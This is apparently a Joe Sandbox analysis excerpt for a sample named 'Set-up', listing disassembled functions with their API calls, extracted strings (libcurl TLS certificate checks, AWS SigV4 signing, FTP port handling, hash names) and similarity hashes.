Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c1b786c7d6042341823b910550c0390e7139c1fed28847e2c2be6fa4b729ab98
Instruction ID: 10c392626b35a942de47babe98715ca9b369d59024ebd0ef5856cc3f2d91f11e
Opcode Fuzzy Hash: c1b786c7d6042341823b910550c0390e7139c1fed28847e2c2be6fa4b729ab98
Instruction Fuzzy Hash: E2B092BA468100ABE6075604B8AB83A76A2FAD5710FD82821F906C01B1D6229D18E662

Non-executed Functions

Function 002462E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00246E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00246F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00247184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00247263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 002475B8

Part of subcall function 0039F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 0039F8AE

Strings

hostname, xrefs: 00247AE1, 00247B10, 00247B29
Could not find certificate ID in OCSP response, xrefs: 0024840A
ipv6 address, xrefs: 00247AD7
Proxy, xrefs: 00246F01
Subject, xrefs: 0024648C
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00247954
Server, xrefs: 00246F06, 00246F10
Version, xrefs: 0024654F
common name: %s (matched), xrefs: 00247F17
SSL certificate revocation reason: %s (%d), xrefs: 002483F1
<, xrefs: 00247F90
Issuer, xrefs: 002464EF
RSA Public Key, xrefs: 00246C31
%lx, xrefs: 00246524
SSL certificate verify result: %s (%ld), xrefs: 00247FB0
%s certificate:, xrefs: 00246F11
: , xrefs: 002478FE
SSL: public key does not match pinned public key, xrefs: 002482B2
SSL: unable to obtain common name from peer certificate, xrefs: 00247F29
rsa, xrefs: 00246C56, 00246C75
Signature, xrefs: 00246D1F
Serial Number, xrefs: 002465F1
Unable to load public key, xrefs: 002469DB
Cert, xrefs: 00246D7F
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00247B2A
subject: %s, xrefs: 00247021
No OCSP response received, xrefs: 002479D8
SSL: could not get peer certificate, xrefs: 00246FD5
issuer: %s, xrefs: 002471CE
OpenSSL, xrefs: 00246DFC, 002478D3
ipv4 address, xrefs: 00247AD2
%02x, xrefs: 002465C8
Error getting peer certificate, xrefs: 00248153
subjectAltName does not match %s %s, xrefs: 00247B11
Public Key Algorithm, xrefs: 00246725
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 0024736B
SSL certificate verify ok., xrefs: 0024809E
%02x:, xrefs: 00246CE8
start date: %.*s, xrefs: 0024707C
SSL: Certificate issuer check failed (%s), xrefs: 00247867
Could not get peer certificate chain, xrefs: 00248122
Remove session ID again from cache, xrefs: 00247DD4
SSL: illegal cert name field, xrefs: 00248078
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00247D38
Unknown error, xrefs: 00246E6A, 00246E72, 00247941, 00247949
unexpected ssl peer type: %d, xrefs: 00247621
[NONE], xrefs: 00247011
expire date: %.*s, xrefs: 002470E2
Start date, xrefs: 00246887
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00248133
Signature Algorithm, xrefs: 002466A6
Invalid OCSP response, xrefs: 00247D4B, 002480B1
No error, xrefs: 00246E65, 0024793C
OCSP response has expired, xrefs: 00248414
SSL certificate issuer check ok (%s), xrefs: 00247CAF
SSL: could not get X509-issuer name, xrefs: 002472C2
pqg, xrefs: 00246A29, 00246A7E, 00246B13, 00246B6C
SSL: Unable to open issuer cert (%s), xrefs: 00247232
vtls/openssl.c, xrefs: 00247BD2, 00247F54, 00248217, 00248278, 00248293
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00247607
BIO_new return NULL, OpenSSL error %s, xrefs: 00246E7D, 00247E52
dsa, xrefs: 00246B71, 00246B90, 00246BAE, 00246BC9
SSL: Unable to read issuer cert (%s), xrefs: 00247995
pub_key, xrefs: 00246AD6, 00246BC4
Error computing OCSP ID, xrefs: 0024806E
/%s, xrefs: 00247489, 00247741
Expire date, xrefs: 002468EE
SSL certificate status: %s (%d), xrefs: 002483B6
subjectAltName: host "%s" matched cert's "%s", xrefs: 002480EC
OCSP response verification failed, xrefs: 0024814C
Invalid OCSP response status: %s (%d), xrefs: 002477F8
%s/%s, xrefs: 00246E01, 002478D8

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: 0d88093f9110532e9e92c63c2f6599d38983cd593db3d0d3081796c6d3f89790
Instruction ID: 937274c227685858c0d78322ed06083a6944b87e85bd178b295e8806b3c72c68
Opcode Fuzzy Hash: 0d88093f9110532e9e92c63c2f6599d38983cd593db3d0d3081796c6d3f89790
Instruction Fuzzy Hash: E00317B5A183416BE725AF109C42B7F76D8AF91708F08082CFD4D9A283F775A964C793

Function 0022E6A0 Relevance: 120.2, APIs: 39, Strings: 29, Instructions: 1230stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00558870: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005588AA

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0022E8EB
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 0022E907
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0022E96C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0022EA3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 0022EA5F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0022EC0A
strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,00000011,%Y%m%dT%H%M%SZ,?), ref: 0022ED17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0022ED37
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0022EE03
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 0022EE24
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,007FB8F1), ref: 0022EE32

Strings

%Y%m%dT%H%M%SZ, xrefs: 0022ED0F
;:, xrefs: 0022F1EA
%s/%s/%s/%s, xrefs: 0022F4DB
host:%s, xrefs: 0022EE68
aws-sigv4: service too long in hostname, xrefs: 0022E91E
Host, xrefs: 0022EDA1
Date, xrefs: 0022F04F
aws-sigv4: service missing in parameters and hostname, xrefs: 0022E92C
%s4%s, xrefs: 0022F5D5
aws_sigv4: picked region %s from host, xrefs: 0022F14C
aws_sigv4: picked service %s from host, xrefs: 0022E9A4
aws:amz, xrefs: 0022E855, 0022E882
Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s, xrefs: 0022F758
%s: %s, xrefs: 0022F1A4
%s%s%s%s%s%.*s, xrefs: 0022F47A
%s4_request, xrefs: 0022F4AD
X-%s-Date, xrefs: 0022ED6A
first aws-sigv4 provider cannot be empty, xrefs: 0022E8BD
x-%s-date:%s, xrefs: 0022ED8F
x-%s-content-sha256, xrefs: 0022EA1A
x-%s-content-sha256: %s, xrefs: 0022EBDF
aws-sigv4: region missing in parameters and hostname, xrefs: 0022F0E4
aws, xrefs: 0022E9D4
http_aws_sigv4.c, xrefs: 0022EC81, 0022EC94, 0022ECA7, 0022ECBA, 0022ECCD, 0022ECE3, 0022EFD2, 0022F014, 0022F773
+, xrefs: 0022E8D1
aws-sigv4: region too long in hostname, xrefs: 0022EB8A
%s4-HMAC-SHA256%s%s%s, xrefs: 0022F59C
Authorization, xrefs: 0022E7E2
%64[^:]:%64[^:]:%64[^:]:%64s, xrefs: 0022E87D

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$strchrstrcpy$__stdio_common_vsscanf_time64memcpystrcspnstrftime
String ID: ;:$%64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$%s: %s$+$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$Date$Host$X-%s-Date$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$host:%s$http_aws_sigv4.c$x-%s-content-sha256$x-%s-content-sha256: %s$x-%s-date:%s
API String ID: 3777502179-657784405
Opcode ID: 7925bb2db4fff071427a347e73d1cf8a0febd0bab85bb6755d4248db9bbf9221
Instruction ID: f1d5ad3e8c136d8b71a5f2c095a4617c3589ec2cc8ae9ee03f5624cf1f4b1c14
Opcode Fuzzy Hash: 7925bb2db4fff071427a347e73d1cf8a0febd0bab85bb6755d4248db9bbf9221
Instruction Fuzzy Hash: 5C9239B1918356ABD720DF60AC41BBB77E8AF95304F04083DFD8896242F7749968C793

Function 0055E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0055E0B3
localeconv.MSVCRT ref: 0055E0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0055E149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0055E179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0055E1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0055E1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0055E20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0055F886

Strings

nil), xrefs: 0056041D
, xrefs: 0055FED0
d, xrefs: 0055EAAF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: a93615b104a9a5ed225173e53e221dff5d7474183c626911b92264778540c8fc
Instruction ID: 1e1e97231f90ce7efc769c885a26f9251f2de14c7710beee0f1a72c983773b8f
Opcode Fuzzy Hash: a93615b104a9a5ed225173e53e221dff5d7474183c626911b92264778540c8fc
Instruction Fuzzy Hash: B91379706087418FC724CF28C0A562ABFE1BFC9355F24492EE9959B3A1D771ED49CB82

Function 0021E520 Relevance: 88.3, APIs: 25, Strings: 25, Instructions: 766COMMON

Download Yara Rule

Strings

NLST, xrefs: 0021E5F6, 0021E5FE
,%d,%d, xrefs: 0021EEBF
EPRT, xrefs: 0021EF42
failed to resolve the address provided to PORT: %s, xrefs: 0021E9DD
PRET %s, xrefs: 0021E5FF
PRET STOR %s, xrefs: 0021E607
???, xrefs: 0021EADC, 0021EAE1, 0021ED2B, 0021ED31, 0021ED96, 0021ED9C
bind() failed, we ran out of ports, xrefs: 0021EB15
PORT, xrefs: 0021EED7
[%s] ftp_state_use_port(), listening on %d, xrefs: 0021ED9D
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 0021ED32
bind(port=%hu) on non-local address failed: %s, xrefs: 0021EBC6
bind(port=%hu) failed: %s, xrefs: 0021ED00
Failure sending EPRT command: %s, xrefs: 0021EF6C
LIST, xrefs: 0021E5F1
PRET RETR %s, xrefs: 0021E5D9
getsockname() failed: %s, xrefs: 0021E905, 0021EC1B
PRET, xrefs: 0021E656
STOP, xrefs: 0021C3C6, 0021EA55
socket failure: %s, xrefs: 0021E9D5
Failure sending PORT command: %s, xrefs: 0021EF05
[%s] ftp_state_use_port(), opened socket, xrefs: 0021EAE2
%s |%d|%s|%hu|, xrefs: 0021EF47
[%s] -> [%s], xrefs: 0021C2D2, 0021C3D2, 0021E4FF, 0021E56E, 0021E662, 0021EA61
%s %s, xrefs: 0021EEDC

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1569884781
Opcode ID: 214773f3c2c33df0b3b9e078d3a809a5c3e0a1088012617a7a4718429067e247
Instruction ID: 8d9033a192b3d1f4cde37b63c62819513bbd3b49ce2f53dc13da789b202410ec
Opcode Fuzzy Hash: 214773f3c2c33df0b3b9e078d3a809a5c3e0a1088012617a7a4718429067e247
Instruction Fuzzy Hash: A0424771628302ABDB14DF24DC45BBB77E8AFA0304F094829FC8587292E774DDA5C792

Function 001DE620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 001DE6F1

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 001DE9AA, 001DEAEB
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 001DE68E, 001DE9AF, 001DEAF0
.%d, xrefs: 001DEE0E
0, xrefs: 001DEBCA
(nil), xrefs: 001DECCD
-, xrefs: 001DEC74

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: 38b44b144e45a84e036971d0460be6bfa7d667640c78fc65d196f2c846e75de3
Instruction ID: 5a4296c5bbb541a2939725b2af99395b55e31738b0832e3c8629361dd446be1b
Opcode Fuzzy Hash: 38b44b144e45a84e036971d0460be6bfa7d667640c78fc65d196f2c846e75de3
Instruction Fuzzy Hash: 7D82B271A083419FD714DE19C88572BBBE1AFC5324F198A2EF89A9B391D730DD46CB42

Function 00460170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00460374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00460395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 0046049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 004604E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 0046055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 0046057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00460618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 004606E3

Strings

@, xrefs: 00460B42
SHA2-224, xrefs: 00460238
SHA1, xrefs: 004601F7
SHA2-384, xrefs: 00460B62
SHA2-512, xrefs: 00460BA5
MD5, xrefs: 00460194
SHA2-256, xrefs: 00460B05

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: 147f5de8191b93eff99879f38a60719d958227c14520a2d331666f3ad2451785
Instruction ID: b16f9125a1ec46e24f454f69987da092a3fee4335523566ca84dfb37f748008a
Opcode Fuzzy Hash: 147f5de8191b93eff99879f38a60719d958227c14520a2d331666f3ad2451785
Instruction Fuzzy Hash: D85291719087818BD711CF29C845BABB7E4BFD9344F048A2EF9C897252E7789905CB87

Function 003AE270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 003AE28D
FindNextFileW.KERNEL32(?,00000000), ref: 003AE2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 003AE30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 003AE3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003AE3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 003AE3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 003AE41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 003AE44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 003AE563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 003AE571

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: f01811aa040c6f9eb85b77341c80982821ac4b11f8b551712fb6e006ace7ad40
